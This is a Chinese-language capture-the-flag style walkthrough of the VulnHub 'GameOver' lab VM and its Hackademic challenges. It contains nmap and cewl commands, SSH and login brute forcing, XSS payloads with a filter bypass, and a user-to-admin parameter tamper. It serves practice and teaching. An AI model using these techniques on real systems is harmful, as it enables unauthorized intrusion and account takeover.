0x00 vulnhub靶場之GameOver_v0.1_Null_VM
傳送門:
https://www.vulnhub.com/entry/gameover-1,16/0x01 環境
NAT模式:主機:192.168.111.1kali:192.168.111.3靶機:192.168.111.18
0x02 測試
nmap -Pn -p- -vv -sV 192.168.111.18先訪問80
ssh爆破(0成功)
使用cewl爬個字典cewl http://192.168.111.18/ -w pass.txtcewl http://192.168.111.18/ --lowercase >> pass.txt去重sort -u <file> > <file1>計算行數(密碼個數)wc -l <file>再爆破SSH
其實(提示也有)
繼續訪問80,有兩部分
第一部分是各種靶場(略過~)
第二部分
Hackademic(10關)
Hackademic 001
萬能密碼、sql跑注入,不行,利用cewl生成密碼
cewl http://192.168.111.18/Hackademic_Challenges/ch001/ --lowercase -w pass.txtcewl http://192.168.111.18/Hackademic_Challenges/ch001/ -w pass1.txt cat pass1.txt >>pass.txt sort -u pass.txt pass1.txtburpsuite抓包,爆破
進入後臺
根據提示,找郵件,使用burpsuite,spider this host,找到可疑郵箱
Everyone is here... xexexe!Crazy Alice Alice@InWonderland.comNebu Chadnezzar NebuChadnezzar@OldKing.eduJo Raimontilinekergrobelar ShortName@badmail.comWeb Killer WebMurder@killer.ever.comDon Quixote windmill@mail.spain Crazy priest Exorcist@hotmail.comJasson Killer Friday13@JasonLives.comEverything All AllweSaid@mail.comThiseas Sparrow Pirates@mail.grBlack Dreamer SupaHacka@mail.comBond James MyNameIsBond@JamesBond.comPoor Boy Millionaire@fmail.comBlind Lynxeyed Linxblind@siou.comEarl Dracula CarpathianServers@Blood.comTea Coffee sugar@dring.comWhisky Vodka drink@drunk.com提示(Friday the 13th!),目標就是:Friday13@JasonLives.com
Hackademic 002
查看網頁源碼,得可疑javascript代碼
讀代碼(可拷貝到javascript在線運行網站運行),得
關鍵字符串:givesacountinatoap lary,對應0-22,整理一下0123 4567 891011 12131415 16171819 20212223give saco unti nato ap l ary對應位置:d=3,j=9,k=10,x=21,t=18,o=13,h=6,i=7,l=11,s=17,q=19,f=5,y=22得Wrong=enter a coin to playHackademic 003
填入代碼<script>alert("XSS!");</script>Hackademic 004
存在過濾,繞過<script>alert(String.fromCharCode(88,83,83,33))</script>Hackademic 005
您需要訪問此SITE的內容。為了實現這一點,您必須購買「 p0wnBrowser」 Web瀏覽器。由於它太昂貴了,因此您必須以某種方式「欺騙」系統,以便它可以讓您閱讀站點的內容。
原請求包與響應包
Hackademic 006
查看網頁源碼
URL解碼
輸入任意code
搜索Wrong,疑似找到密碼
Hackademic 007
存在目錄瀏覽
查看lastlogin.txt
使用Irene登錄
要進入管理員後臺,burpsuite抓包看看,存在越權,user改為admin
Hackademic 008
iduid=48(apache) gid=48(apache) groups=48(apache)lsindex.phpb64.txt訪問http://192.168.111.18/Hackademic_Challenges/ch008/b64.txt
Hackademic 009
參考師傅的writeup,存在後門
ls訪問:http://192.168.111.18/Hackademic_Challenges/ch009/sUpErDuPErL33T.txtusername: Adminpassword: teh_n1nj4_pwn3remail : admin@prwtoftyari.gr輸入帳號密碼
Hackademic 010
查看網頁源碼
POST發送:LetMeIn=True&password=123&login=Login%53%65%72%69%61%6C%20%4E%75%6D%62%65%72%3A%20%54%52%56%4E%2D%36%37%51%32%2D%52%55%39%38%2D%35%34%36%46%2D%48%31%5A%54URL解碼:Serial Number: TRVN-67Q2-RU98-546F-H1ZT進入,from輸入任意字符,輸入序列號
Vicnum
猜數字
下面不好玩,放棄了
0x03 參考